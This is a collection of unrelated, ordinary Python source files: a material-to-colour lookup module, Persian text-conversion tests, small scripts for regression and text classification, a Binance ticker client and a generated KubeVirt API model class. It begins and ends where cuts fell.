("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_2_Yellow_1K/NumberBlockYellow_2",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_3_Yellow_1K/NumberBlockYellow_3",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_4_Yellow_1K/NumberBlockYellow_4",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_5_Yellow_1K/NumberBlockYellow_5",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_6_Yellow_1K/NumberBlockYellow_6",
["yellow", "brown"])
]
CARDBOARD_MATERIALS = [
("AI2-THOR/Materials/Misc/Cardboard_Brown", ["brown"]),
("AI2-THOR/Materials/Misc/Cardboard_Tan", ["brown"]),
("AI2-THOR/Materials/Misc/Cardboard_White", ["grey"])
]
CERAMIC_MATERIALS = [
("AI2-THOR/Materials/Ceramics/BrownMarbleFake 1", ["brown"]),
("AI2-THOR/Materials/Ceramics/ConcreteBoards1", ["grey"]),
("AI2-THOR/Materials/Ceramics/ConcreteFloor", ["grey"]),
("AI2-THOR/Materials/Ceramics/GREYGRANITE", ["grey"]),
("AI2-THOR/Materials/Ceramics/PinkConcrete_Bedroom1", ["red"]),
("AI2-THOR/Materials/Ceramics/RedBrick", ["red"]),
("AI2-THOR/Materials/Ceramics/TexturesCom_BrickRound0044_1_seamless_S",
["grey"]),
("AI2-THOR/Materials/Ceramics/WhiteCountertop", ["grey"])
]
FABRIC_MATERIALS = [
("AI2-THOR/Materials/Fabrics/BedroomCarpet", ["blue"]),
("AI2-THOR/Materials/Fabrics/Carpet2", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet3", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet4", ["blue"]),
("AI2-THOR/Materials/Fabrics/Carpet8", ["black"]),
("AI2-THOR/Materials/Fabrics/CarpetDark", ["yellow"]),
("AI2-THOR/Materials/Fabrics/CarpetDark 1", ["brown"]),
("AI2-THOR/Materials/Fabrics/CarpetDarkGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite", ["white"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite 3", ["white"]),
("AI2-THOR/Materials/Fabrics/HotelCarpet", ["red"]),
("AI2-THOR/Materials/Fabrics/HotelCarpet3", ["red", "black"]),
("AI2-THOR/Materials/Fabrics/RUG2", ["red", "blue"]),
("AI2-THOR/Materials/Fabrics/Rug3", ["blue", "red"]),
("AI2-THOR/Materials/Fabrics/RUG4", ["red", "yellow"]),
("AI2-THOR/Materials/Fabrics/Rug5", ["white"]),
("AI2-THOR/Materials/Fabrics/Rug6", ["green", "purple", "red"]),
("AI2-THOR/Materials/Fabrics/RUG7", ["red", "blue"]),
("AI2-THOR/Materials/Fabrics/RugPattern224", ["green", "brown", "white"])
] + _CUSTOM_CARPET_MATERIALS
METAL_MATERIALS = [
("AI2-THOR/Materials/Metals/BlackSmoothMeta", ["black"]),
("AI2-THOR/Materials/Metals/Brass 1", ["yellow"]),
("AI2-THOR/Materials/Metals/BrownMetal 1", ["brown"]),
("AI2-THOR/Materials/Metals/BrushedAluminum_Blue", ["blue"]),
("AI2-THOR/Materials/Metals/BrushedIron_AlbedoTransparency", ["black"]),
("AI2-THOR/Materials/Metals/GenericStainlessSteel", ["grey"]),
("AI2-THOR/Materials/Metals/HammeredMetal_AlbedoTransparency 1",
["green"]),
("AI2-THOR/Materials/Metals/Metal", ["grey"]),
("AI2-THOR/Materials/Metals/WhiteMetal", ["white"]),
("UnityAssetStore/Baby_Room/Models/Materials/cabinet metal", ["grey"])
]
PLASTIC_MATERIALS = [
("AI2-THOR/Materials/Plastics/BlackPlastic", ["black"]),
("AI2-THOR/Materials/Plastics/OrangePlastic", ["orange"]),
("AI2-THOR/Materials/Plastics/WhitePlastic", ["white"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 1",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 2",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 4",
["yellow"])
]
RUBBER_MATERIALS = [
("AI2-THOR/Materials/Plastics/BlueRubber", ["blue"]),
("AI2-THOR/Materials/Plastics/LightBlueRubber", ["blue"])
]
WALL_MATERIALS = [
("AI2-THOR/Materials/Walls/BrownDrywall", ["brown"]),
("AI2-THOR/Materials/Walls/Drywall", ["white"]),
("AI2-THOR/Materials/Walls/DrywallBeige", ["brown"]),
("AI2-THOR/Materials/Walls/DrywallGreen", ["green"]),
("AI2-THOR/Materials/Walls/DrywallOrange", ["orange"]),
("AI2-THOR/Materials/Walls/Drywall4Tiled", ["white"]),
("AI2-THOR/Materials/Walls/EggshellDrywall", ["blue"]),
("AI2-THOR/Materials/Walls/RedDrywall", ["red"]),
("AI2-THOR/Materials/Walls/WallDrywallGrey", ["grey"]),
("AI2-THOR/Materials/Walls/YellowDrywall", ["yellow"])
] + _CUSTOM_DRYWALL_MATERIALS
WOOD_MATERIALS = [
("AI2-THOR/Materials/Wood/BedroomFloor1", ["brown"]),
("AI2-THOR/Materials/Wood/BlackWood", ["black"]),
("AI2-THOR/Materials/Wood/DarkWood2", ["black"]),
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/LightWoodCounters 1", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters3", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters4", ["brown"]),
("AI2-THOR/Materials/Wood/TexturesCom_WoodFine0050_1_seamless_S",
["brown"]),
("AI2-THOR/Materials/Wood/WhiteWood", ["white"]),
("AI2-THOR/Materials/Wood/WoodFloorsCross", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Brown", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Tan", ["brown"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
("UnityAssetStore/Baby_Room/Models/Materials/wood 1", ["brown"])
] + _CUSTOM_WOOD_MATERIALS
SOFA_1_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Sofa1_Brown", ["brown"]),
("AI2-THOR/Materials/Fabrics/Sofa1_Red", ["red"])
]
SOFA_CHAIR_1_MATERIALS = [
("AI2-THOR/Materials/Fabrics/SofaChair1_Black", ["black"]),
("AI2-THOR/Materials/Fabrics/SofaChair1_Brown", ["brown"])
]
SOFA_2_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Sofa2_Grey", ["grey"]),
("AI2-THOR/Materials/Fabrics/Sofa2_White", ["white"])
]
SOFA_3_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Sofa3_Blue", ["blue"]),
("AI2-THOR/Materials/Fabrics/Sofa3_Brown", ["brown"]),
("AI2-THOR/Materials/Fabrics/Sofa3_Green_Dark", ["green"]),
("AI2-THOR/Materials/Fabrics/Sofa3_Red", ["red"])
]
# Choose only ceramic, fabric, metal, and wood materials that aren't too shiny
# or have distracting patterns.
FLOOR_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Carpet2", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet3", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet4", ["blue"]),
("AI2-THOR/Materials/Fabrics/Carpet8", ["black"]),
("AI2-THOR/Materials/Fabrics/CarpetDark", ["yellow"]),
("AI2-THOR/Materials/Fabrics/CarpetDark 1", ["brown"]),
("AI2-THOR/Materials/Fabrics/CarpetDarkGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite", ["white"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite 3", ["white"]),
("AI2-THOR/Materials/Wood/DarkWood2", ["black"]),
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/LightWoodCounters 1", ["brown"]),
("AI2-THOR/Materials/Wood/TexturesCom_WoodFine0050_1_seamless_S",
["brown"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
("UnityAssetStore/Baby_Room/Models/Materials/wood 1", ["brown"])
]
INTUITIVE_PHYSICS_BLOCK_MATERIALS = [
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/blue_1x1",
["blue"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/gray_1x1",
["grey"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/green_1x1",
["green"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/red_1x1",
["red"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/wood_1x1",
["brown"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/yellow_1x1",
["yellow"])
]
INTUITIVE_PHYSICS_METAL_MATERIALS = [
("AI2-THOR/Materials/Metals/Brass 1", ["yellow"]),
("AI2-THOR/Materials/Metals/BrownMetal 1", ["brown"]),
("AI2-THOR/Materials/Metals/BrushedAluminum_Blue", ["blue"]),
("AI2-THOR/Materials/Metals/BrushedIron_AlbedoTransparency", ["black"]),
("AI2-THOR/Materials/Metals/GenericStainlessSteel", ["grey"]),
("AI2-THOR/Materials/Metals/HammeredMetal_AlbedoTransparency 1",
["green"]),
("AI2-THOR/Materials/Metals/Metal", ["grey"]),
("UnityAssetStore/Baby_Room/Models/Materials/cabinet metal", ["grey"])
]
INTUITIVE_PHYSICS_PLASTIC_MATERIALS = [
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 1",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 2",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 4",
["yellow"])
]
INTUITIVE_PHYSICS_WOOD_MATERIALS = [
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/LightWoodCounters 1", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters3", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters4", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Brown", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Tan", ["brown"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
("UnityAssetStore/Baby_Room/Models/Materials/wood 1", ["brown"])
]
# Room and occluder walls in intuitive physics scenes cannot use reflective
# materials, like some ceramics, metals and woods, due to the glare.
INTUITIVE_PHYSICS_WALL_GROUPINGS = [WALL_MATERIALS + [
("AI2-THOR/Materials/Ceramics/BrownMarbleFake 1", ["brown"]),
("AI2-THOR/Materials/Ceramics/ConcreteFloor", ["grey"]),
("AI2-THOR/Materials/Ceramics/GREYGRANITE", ["grey"]),
("AI2-THOR/Materials/Ceramics/RedBrick", ["red"]),
("AI2-THOR/Materials/Ceramics/TexturesCom_BrickRound0044_1_seamless_S",
["grey"]),
("AI2-THOR/Materials/Ceramics/WhiteCountertop", ["grey"]),
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
]]
CEILING_AND_WALL_GROUPINGS = [
CERAMIC_MATERIALS,
# TODO FIXME metallic materials in v0.4.4+
# METAL_MATERIALS,
WALL_MATERIALS,
WOOD_MATERIALS
]
FLAT_MATERIALS = [
AZURE,
BLACK,
BLUE,
BROWN,
CHARTREUSE,
CYAN,
GOLDENROD,
GREEN,
GREY,
INDIGO,
LIME,
MAGENTA,
MAROON,
NAVY,
OLIVE,
ORANGE,
PINK,
RED,
ROSE,
PURPLE,
SPRINGGREEN,
TAN,
TEAL,
VIOLET,
WHITE,
YELLOW
]
# Every (material, colors) tuple from all of the categories above.
ALL_MATERIAL_TUPLES = (
    BLOCK_BLANK_MATERIALS +
    BLOCK_LETTER_MATERIALS +
    BLOCK_NUMBER_MATERIALS +
    CARDBOARD_MATERIALS +
    CERAMIC_MATERIALS +
    FABRIC_MATERIALS +
    METAL_MATERIALS +
    PLASTIC_MATERIALS +
    RUBBER_MATERIALS +
    WALL_MATERIALS +
    WOOD_MATERIALS +
    SOFA_1_MATERIALS +
    SOFA_CHAIR_1_MATERIALS +
    SOFA_2_MATERIALS +
    SOFA_3_MATERIALS +
    FLAT_MATERIALS
)
# De-duplicated material resource paths. NOTE: iteration order is
# arbitrary because of the intermediate set().
ALL_MATERIAL_STRINGS = list(set([
    material_tuple[0] for material_tuple in ALL_MATERIAL_TUPLES
]))
def find_colors(
    material_name: str, default_value: Optional[List[str]] = None
) -> Optional[List[str]]:
    """
    Return the color word list for the given material resource path.

    :param material_name: full material resource path to look up
    :param default_value: value returned when no material matches
        (was mis-annotated as ``str`` — it holds the fallback color list)
    :return: the material's color list, or default_value on no match
    """
    for item in ALL_MATERIAL_TUPLES:
        if item[0] == material_name:
            return item[1]
    return default_value
# Names of every public *_MATERIALS list defined in this module, so
# callers can enumerate the available material categories by name.
ALL_MATERIAL_LISTS = [
    global_name
    for global_name in globals()
    if global_name.endswith('_MATERIALS') and not global_name.startswith('_')
]
|
from unittest import TestCase
import pytest
from persiantools import characters, digits
class TestDigits(TestCase):
    """Tests for persiantools.characters (Arabic -> Persian conversion).

    NOTE(review): the class name says Digits but it mostly exercises the
    `characters` module; renaming would change test discovery, so the
    name is kept as-is.
    """

    def test_ar_to_fa(self):
        self.assertEqual(characters.ar_to_fa("السلام عليكم"), "السلام علیکم")
        self.assertEqual(characters.ar_to_fa("HI ي"), "HI ی")
        # The next two assertions look identical; they may differ only in
        # invisible codepoints, so both are kept. TODO confirm and
        # de-duplicate if truly equal.
        self.assertEqual(characters.ar_to_fa("دِ بِ زِ ذِ شِ سِ ى ي ك"), "د ب ز ذ ش س ی ی ک")
        self.assertEqual(characters.ar_to_fa("دِ بِ زِ ذِ شِ سِ ى ي ك"), "د ب ز ذ ش س ی ی ک")
        self.assertEqual(
            characters.ar_to_fa("ظ ط ذ د ز ر و ، . ش س ي ب ل ا ت ن م ك ض ص ث ق ف غ ع ه خ ح ؟"),
            "ظ ط ذ د ز ر و ، . ش س ی ب ل ا ت ن م ک ض ص ث ق ف غ ع ه خ ح ؟",
        )
        # Non-string input must raise TypeError.
        with pytest.raises(TypeError):
            characters.ar_to_fa(12345)
        # Character and digit conversion compose.
        orig = "السلام عليكم ٠١٢٣٤٥٦٧٨٩"
        converted = characters.ar_to_fa(orig)
        converted = digits.ar_to_fa(converted)
        self.assertEqual(converted, "السلام علیکم ۰۱۲۳۴۵۶۷۸۹")

    def test_fa_to_fa(self):
        # Already-Persian text must pass through unchanged (idempotence).
        # The two assertions look identical; kept in case they differ in
        # invisible codepoints. TODO confirm and de-duplicate.
        self.assertEqual(characters.ar_to_fa("السلام علیکم"), "السلام علیکم")
        self.assertEqual(characters.ar_to_fa("السلام علیکم"), "السلام علیکم")

    def test_fa_to_ar(self):
        self.assertEqual(characters.fa_to_ar("کیک"), "كيك")
        with pytest.raises(TypeError):
            # Fix: was `characters.ar_to_fa(12345)` — a copy/paste slip;
            # this test targets fa_to_ar's type validation.
            characters.fa_to_ar(12345)
|
# Set up the paths.
import os
import sys
# Make the current working directory importable so the module under
# test can be found regardless of where pytest is invoked from.
sys.path.append(os.path.abspath('.'))
import themodule
def test_hallo():
    # hallo() must return exactly the greeting string.
    assert themodule.hallo() == "hallo"
def test_nohallo():
    # Sanity check: hallo() must not return an unrelated string.
    assert themodule.hallo() != "blaat"
|
from models.model_plain import ModelPlain
class ModelPlain2(ModelPlain):
    """Train with two inputs (L, C) and with pixel loss"""
    # ----------------------------------------
    # feed L/H data
    # ----------------------------------------
    def feed_data(self, data, need_H=True):
        # Move the L input and the auxiliary C input to the model device.
        # NOTE(review): data values are presumably torch tensors (they
        # expose .to(device)); H appears to be the target, only needed
        # when need_H is True (e.g. training/eval) — confirm in ModelPlain.
        self.L = data['L'].to(self.device)
        self.C = data['C'].to(self.device)
        if need_H:
            self.H = data['H'].to(self.device)
    # ----------------------------------------
    # feed (L, C) to netG and get E
    # ----------------------------------------
    def netG_forward(self):
        # E is the network output estimated from the (L, C) pair.
        self.E = self.netG(self.L, self.C)
|
from random import randint

# Draw five random numbers in [0, 10], print them, then report the
# largest and the smallest of the draw.
numeros = tuple(randint(0, 10) for _ in range(5))
for sorteado in numeros:
    print(f'{sorteado} ', end='')
print('\nO maior numero sorteado e {}.'.format(max(numeros)))
print('O menor numero sorteado e {}.'.format(min(numeros)))
|
import sys
import os
from sklearn.linear_model import LinearRegression
from sklearn.grid_search import GridSearchCV
from utils.CSVHandler import CSVHandler
from utils.Preprocessor import Preprocessor
# from utils.Visualizer import Visualizer
from utils.Logger import Logger
"""
File paths
"""
data_dir = '../data/'
train_filename = 'train.csv'
test_filename = 'test.csv'
"""
Make directory to save result
"""
# Best-effort: create the output directory, ignoring the expected error
# when it already exists. OSError is caught instead of the original
# bare `except:` so that KeyboardInterrupt/SystemExit are no longer
# silently swallowed.
try:
    os.mkdir('./predict/')
except OSError:
    pass
# main loop
def main():
    """Train a grid-searched linear regression on the house-price CSVs
    and save integer predictions for the test set.

    Returns 0 on success, 1 if the input CSVs cannot be loaded.
    NOTE(review): GridSearchCV is imported from the long-deprecated
    sklearn.grid_search module at the top of this file; it moved to
    sklearn.model_selection — consider updating the import.
    """
    csv_handler = CSVHandler(data_dir)
    preprocessor = Preprocessor()
    # visualizer = Visualizer()
    logger = Logger()
    # load train data and test data
    try:
        train = csv_handler.load_csv(train_filename)
        test = csv_handler.load_csv(test_filename)
    except Exception as e:
        logger.show_exception(e)
        # Fix: bail out here. The original fell through and then crashed
        # with a NameError on `train` below.
        return 1
    # preprocess both datasets; keep the raw target column first
    t_train = train["SalePrice"].values
    train, test = preprocessor.preprocess(train, test, except_num=True)
    # extract feature matrices for both datasets
    x_train = train.values
    x_test = test.values
    # save test ids for the submission file
    test_ids = test.index
    # design training: 5-fold CV over the `normalize` flag
    tuned_parameters = [{'normalize': [True, False]}]
    reg = GridSearchCV(
        LinearRegression(),
        tuned_parameters,
        cv=5
    )
    # train
    reg.fit(x_train, t_train)
    logger.show_training_result(reg)
    # prediction (cast to int; y_train is kept for the commented-out
    # visualizer below)
    y_train = reg.predict(x_train).astype(int)
    y_test = reg.predict(x_test).astype(int)
    # save
    output = zip(test_ids, y_test)
    csv_handler.save_csv(output, 'linear_regression')
    # show difference between true distribution and prediction
    # visualizer.show_result(t_train, y_train)
    return 0
# Script entry point: use main()'s return value as the process exit code.
if __name__ == '__main__':
    sys.exit(main())
|
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-unsignedShort-enumeration-4-NS"
class NistschemaSvIvAtomicUnsignedShortEnumeration4Type(Enum):
VALUE_3331 = 3331
VALUE_794 = 794
VALUE_91 = 91
VALUE_5792 = 5792
VALUE_5361 = 5361
VALUE_72 = 72
VALUE_1768 = 1768
VALUE_37 = 37
VALUE_464 = 464
@dataclass
class NistschemaSvIvAtomicUnsignedShortEnumeration4:
class Meta:
name = "NISTSchema-SV-IV-atomic-unsignedShort-enumeration-4"
namespace = "NISTSchema-SV-IV-atomic-unsignedShort-enumeration-4-NS"
value: Optional[NistschemaSvIvAtomicUnsignedShortEnumeration4Type] = field(
default=None,
metadata={
"required": True,
}
)
|
# Binance
# https://github.com/binance-exchange/binance-official-api-docs/blob/master/rest-api.md
# By Lari Taskula <lari@taskula.fi>
from exchange import Exchange, CURRENCY
class Binance(Exchange):
    """Asset-price source for the Binance exchange.

    Uses Binance's public v1 REST API both for pair discovery
    (exchangeInfo) and for 24-hour ticker data.
    """
    name = "Binance"
    code = "binance"
    ticker = "https://www.binance.com/api/v1/ticker/24hr"
    discovery = "https://www.binance.com/api/v1/exchangeInfo"
    default_label = "cur"
    asset_pairs = [
        {'isocode': 'XXBTZUSD', 'pair': 'BTCUSDT', 'name': 'BTC to USD', 'currency': CURRENCY['usd']}
    ]
    # Binance symbols that differ from the names used by this app.
    # Hoisted out of _parse_discovery so the dict is built once instead
    # of per asset. NOTE(review): the XZC -> ZEC mapping is kept from
    # the original code even though XZC (Zcoin) and ZEC (Zcash) are
    # distinct assets — confirm intent.
    ASSET_NAME_FIXES = {'XZC': 'ZEC', 'BCC': 'BCH', 'IOTA': 'IOT'}

    @classmethod
    def _get_discovery_url(cls):
        """URL listing every tradable symbol, used for pair discovery."""
        return cls.discovery

    def _get_ticker_url(self):
        """24h ticker URL for this instance's currently selected pair."""
        return self.ticker + '?symbol=' + self.pair

    @staticmethod
    def _parse_discovery(result):
        """Convert an exchangeInfo response into asset-pair dicts."""
        asset_pairs = []
        assets = result.get('symbols')
        names = Binance.ASSET_NAME_FIXES
        for asset in assets:
            base = asset.get('baseAsset')
            quote = asset.get('quoteAsset')
            if base in names:
                base = names[base]
            if quote in names:
                quote = names[quote]
            asset_pair = {
                'pair': asset.get('symbol'),
                'base': base,
                'quote': quote,
                'name': base + ' to ' + quote,
                'currency': quote.lower(),
                'volumecurrency': base
            }
            asset_pairs.append(asset_pair)
        return asset_pairs

    def _parse_ticker(self, asset):
        """Extract the displayed fields from one 24h ticker entry."""
        cur = asset.get('lastPrice')
        bid = asset.get('bidPrice')
        high = asset.get('highPrice')
        low = asset.get('lowPrice')
        ask = asset.get('askPrice')
        vol = asset.get('volume')
        return {
            'cur': cur,
            'bid': bid,
            'high': high,
            'low': low,
            'ask': ask,
            'vol': vol
        }
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from stw import SupervisedTermWeightingWTransformer
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score, recall_score, f1_score
# Load the pre-split datasets; each row references a document file.
train = pd.read_csv('train.csv')
test = pd.read_csv('test.csv')
# Construct term count matrix for train and test datasets
vectorizer = CountVectorizer(input='filename')
train_x = vectorizer.fit_transform(train['filename'])
train_y = train['target']
test_x = vectorizer.transform(test['filename'])
test_y = test['target']
# Use SVM as classifier
clf = LinearSVC()
# tf-idf unsupervised term weighting
transformer = TfidfTransformer()
train_x_t = transformer.fit_transform(train_x, train_y)
test_x_t = transformer.transform(test_x)
# Train classifier and make predictions
clf.fit(train_x_t, train_y)
pred = clf.predict(test_x_t)
# Assess performance. Fix: the original Python 2 `print ...` statements
# are syntax errors on Python 3; print() calls work on both versions.
print('tf-idf scheme: accuracy = %0.2f, recall = %0.2f, f1 score = %0.2f' %
      (accuracy_score(test_y, pred), recall_score(test_y, pred), f1_score(test_y, pred)))
# Supervised term weighting schemes
for scheme in ['tfchi2', 'tfig', 'tfgr', 'tfor', 'tfrf']:
    transformer = SupervisedTermWeightingWTransformer(scheme=scheme)
    train_x_t = transformer.fit_transform(train_x, train_y)
    test_x_t = transformer.transform(test_x)
    # Train classifier and make predictions
    clf.fit(train_x_t, train_y)
    pred = clf.predict(test_x_t)
    # Assess performance
    print('%s scheme: accuracy = %0.2f, recall = %0.2f, f1 score = %0.2f' %
          (scheme, accuracy_score(test_y, pred), recall_score(test_y, pred), f1_score(test_y, pred)))
|
# coding: utf-8
"""
KubeVirt API
This is KubeVirt API an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: kubevirt-dev@googlegroups.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1KubeVirtWorkloadUpdateStrategy(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
        swagger_types (dict): The key is attribute name
            and the value is attribute type.
        attribute_map (dict): The key is attribute name
            and the value is json key in definition.
    """
    swagger_types = {
        'batch_eviction_interval': 'K8sIoApimachineryPkgApisMetaV1Duration',
        'batch_eviction_size': 'int',
        'workload_update_methods': 'list[str]'
    }
    attribute_map = {
        'batch_eviction_interval': 'batchEvictionInterval',
        'batch_eviction_size': 'batchEvictionSize',
        'workload_update_methods': 'workloadUpdateMethods'
    }

    def __init__(self, batch_eviction_interval=None, batch_eviction_size=None, workload_update_methods=None):
        """
        V1KubeVirtWorkloadUpdateStrategy - a model defined in Swagger
        """
        # Backing fields for the declared swagger attributes.
        self._batch_eviction_interval = None
        self._batch_eviction_size = None
        self._workload_update_methods = None
        # Route non-None constructor args through the property setters.
        if batch_eviction_interval is not None:
            self.batch_eviction_interval = batch_eviction_interval
        if batch_eviction_size is not None:
            self.batch_eviction_size = batch_eviction_size
        if workload_update_methods is not None:
            self.workload_update_methods = workload_update_methods

    @property
    def batch_eviction_interval(self):
        """
        Gets the batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
        BatchEvictionInterval Represents the interval to wait before issuing the next batch of shutdowns Defaults to 1 minute

        :return: The batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
        :rtype: K8sIoApimachineryPkgApisMetaV1Duration
        """
        return self._batch_eviction_interval

    @batch_eviction_interval.setter
    def batch_eviction_interval(self, batch_eviction_interval):
        """
        Sets the batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
        BatchEvictionInterval Represents the interval to wait before issuing the next batch of shutdowns Defaults to 1 minute

        :param batch_eviction_interval: The batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
        :type: K8sIoApimachineryPkgApisMetaV1Duration
        """
        self._batch_eviction_interval = batch_eviction_interval

    @property
    def batch_eviction_size(self):
        """
        Gets the batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
        BatchEvictionSize Represents the number of VMIs that can be forced updated per the BatchShutdownInteral interval Defaults to 10

        :return: The batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
        :rtype: int
        """
        return self._batch_eviction_size

    @batch_eviction_size.setter
    def batch_eviction_size(self, batch_eviction_size):
        """
        Sets the batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
        BatchEvictionSize Represents the number of VMIs that can be forced updated per the BatchShutdownInteral interval Defaults to 10

        :param batch_eviction_size: The batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
        :type: int
        """
        self._batch_eviction_size = batch_eviction_size

    @property
    def workload_update_methods(self):
        """
        Gets the workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
        WorkloadUpdateMethods defines the methods that can be used to disrupt workloads during automated workload updates. When multiple methods are present, the least disruptive method takes precedence over more disruptive methods. For example if both LiveMigrate and Shutdown methods are listed, only VMs which are not live migratable will be restarted/shutdown An empty list defaults to no automated workload updating

        :return: The workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
        :rtype: list[str]
        """
        return self._workload_update_methods

    @workload_update_methods.setter
    def workload_update_methods(self, workload_update_methods):
        """
        Sets the workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
        WorkloadUpdateMethods defines the methods that can be used to disrupt workloads during automated workload updates. When multiple methods are present, the least disruptive method takes precedence over more disruptive methods. For example if both LiveMigrate and Shutdown methods are listed, only VMs which are not live migratable will be restarted/shutdown An empty list defaults to no automated workload updating

        :param workload_update_methods: The workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
        :type: list[str]
        """
        self._workload_update_methods = workload_update_methods

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}
        # Recursively convert nested models / lists / dicts of models.
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
